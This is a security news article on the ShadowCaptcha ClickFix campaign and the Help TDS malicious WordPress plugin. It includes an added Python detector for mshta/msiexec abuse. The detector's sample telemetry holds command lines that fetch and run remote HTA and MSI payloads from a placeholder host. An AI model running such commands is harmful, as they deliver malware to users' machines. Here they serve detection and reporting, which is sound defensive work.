A new large-scale campaign exploits over 100 compromised WordPress sites to direct visitors to fake CAPTCHA verification pages. This campaign employs the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.
The large-scale cybercrime campaign, which researchers first detected in August 2025, is codenamed ShadowCaptcha by the Israel National Digital Agency.
Researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman stated, “The campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems.”
They further explained, “The ultimate objectives of ShadowCaptcha include collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.”
How the Attack Works
The attacks begin when unsuspecting users visit a compromised WordPress website injected with malicious JavaScript code. This code initiates a redirection chain that takes users to a fake Cloudflare or Google CAPTCHA page.
From this point, the attack chain forks into two paths, depending on the ClickFix instructions displayed on the web page. One path utilizes the Windows Run dialog, while the other guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.
The execution flow triggered via the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers through MSI installers launched using msiexec.exe or via remotely-hosted HTA files run using mshta.exe. In contrast, executing the saved HTA payload results in the installation of Epsilon Red ransomware.
It’s important to note that CloudSEK documented the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware last month.
The researchers explained, “The compromised ClickFix page automatically executes obfuscated JavaScript that uses ‘navigator.clipboard.writeText’ to copy a malicious command to the user’s clipboard without any interaction, relying on users to paste and run it unknowingly.”
These attacks utilize anti-debugger techniques that prevent inspection of web pages using browser developer tools. Additionally, they rely on DLL side-loading to execute malicious code under the guise of legitimate processes.
ShadowCaptcha
Some ShadowCaptcha campaigns have been observed delivering an XMRig-based cryptocurrency miner. Notably, some variants fetch the mining configuration from a Pastebin URL rather than hard-coding it in the malware, allowing them to adjust parameters on the fly.
In cases where the miner payloads are deployed, attackers have also been observed dropping a vulnerable driver (WinRing0x64.sys) to achieve kernel-level access and interact with CPU registers, aiming to improve mining efficiency.
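As an added example, not code from the article or from the Israel National Digital Agency researchers, the following Python sketches endpoint detection logic for the execution paths described above: explorer.exe spawning mshta.exe or msiexec.exe with a remote URL (the Run-dialog path), mshta.exe running a saved .hta file, and a load of the WinRing0x64.sys driver seen with the miner variants. The key=value log format, and every host and path in the sample lines, are constructed assumptions rather than any product's schema or indicators from the article.

```python
import re
from typing import Optional

# LOLBins named in the article and the vulnerable driver dropped by miner variants.
LOLBINS = {"mshta.exe", "msiexec.exe"}
SUSPECT_DRIVER = "winring0x64.sys"
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def parse(line: str) -> dict:
    """Parse one constructed key=value log line (quoted values allowed)."""
    return {k: v.strip('"') for k, v in KV.findall(line)}

def classify(line: str) -> Optional[str]:
    """Return a finding label for one event, or None if nothing matched."""
    ev = parse(line)
    kind = ev.get("event")
    if kind == "process_create":
        image = basename(ev.get("image", ""))
        parent = basename(ev.get("parent", ""))
        cmd = ev.get("cmdline", "")
        # Run-dialog path: explorer.exe spawns mshta/msiexec pointed at a remote URL.
        if image in LOLBINS and parent == "explorer.exe" and REMOTE_URL.search(cmd):
            return f"clickfix-lolbin:{image}"
        # Saved-HTA path: mshta.exe executing a local .hta file.
        if image == "mshta.exe" and cmd.lower().endswith(".hta"):
            return "clickfix-local-hta"
    elif kind == "driver_load" and basename(ev.get("image", "")) == SUSPECT_DRIVER:
        return "vulnerable-driver:winring0"
    return None

def scan(lines):
    """Return (index, label) for every line that triggers a finding."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

# Constructed sample telemetry; hosts and paths are placeholders, not IoCs from the article.
SAMPLE_LOGS = [
    r'event=process_create parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe https://example.invalid/verify.hta"',
    r'event=process_create parent="C:\Windows\explorer.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i https://example.invalid/setup.msi /qn"',
    r'event=process_create parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe C:\Users\u\Downloads\captcha.hta"',
    r'event=driver_load image="C:\Windows\Temp\WinRing0x64.sys"',
    r'event=process_create parent="C:\Windows\System32\services.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /V"',
    r'event=process_create parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe notes.txt"',
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_LOGS):
        print(idx, label)
```

The rules are deliberately narrow (parent process plus remote URL) so that routine service-started msiexec.exe activity, as in the fifth sample line, does not fire; tune the parent list to your environment before deploying.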
Most of the infected WordPress sites are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning sectors such as technology, hospitality, legal/finance, healthcare, and real estate.
WordPress Websites Compromised
The exact method of compromising these WordPress sites remains unclear. However, Goldman informed The Hacker News that there is medium confidence that attackers gained access through various known exploits in a variety of plugins, and in some instances, they used the WordPress portal with compromised credentials.
To mitigate the risks posed by ShadowCaptcha, organizations must train users to be vigilant against ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites remain up-to-date and secured using multi-factor authentication (MFA) protections.
The researchers concluded, “ShadowCaptcha demonstrates how social-engineering attacks have evolved into full-spectrum cyber operations. By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”
This disclosure coincides with GoDaddy’s detailing of the evolution of Help TDS, a traffic distribution system active since 2017 and linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates injected into WordPress sites, ultimately directing users to malicious destinations based on targeting criteria.
Security researcher Denis Sinegubko stated, “The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams.”
Notable malware campaigns leveraging Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force browsers into full-screen mode, displaying fraudulent alerts and even featuring counterfeit CAPTCHA challenges to sidestep automated security scanners.
Malicious WordPress Plugin
Between late 2024 and August 2025, Help TDS operators developed a malicious WordPress plugin known as “woocommerce_inputs”. The plugin provides redirection functionality while steadily adding features for credential harvesting, geographic filtering, and advanced evasion techniques. Experts estimate that it is installed on over 10,000 sites worldwide.
The malicious plugin masquerades as WooCommerce to evade detection by site owners. Attackers install it exclusively after compromising WordPress sites through stolen administrator credentials.
GoDaddy stated, “This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering.”
They further explained, “By providing ready-made solutions, including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites.”
Source: TheHackerNews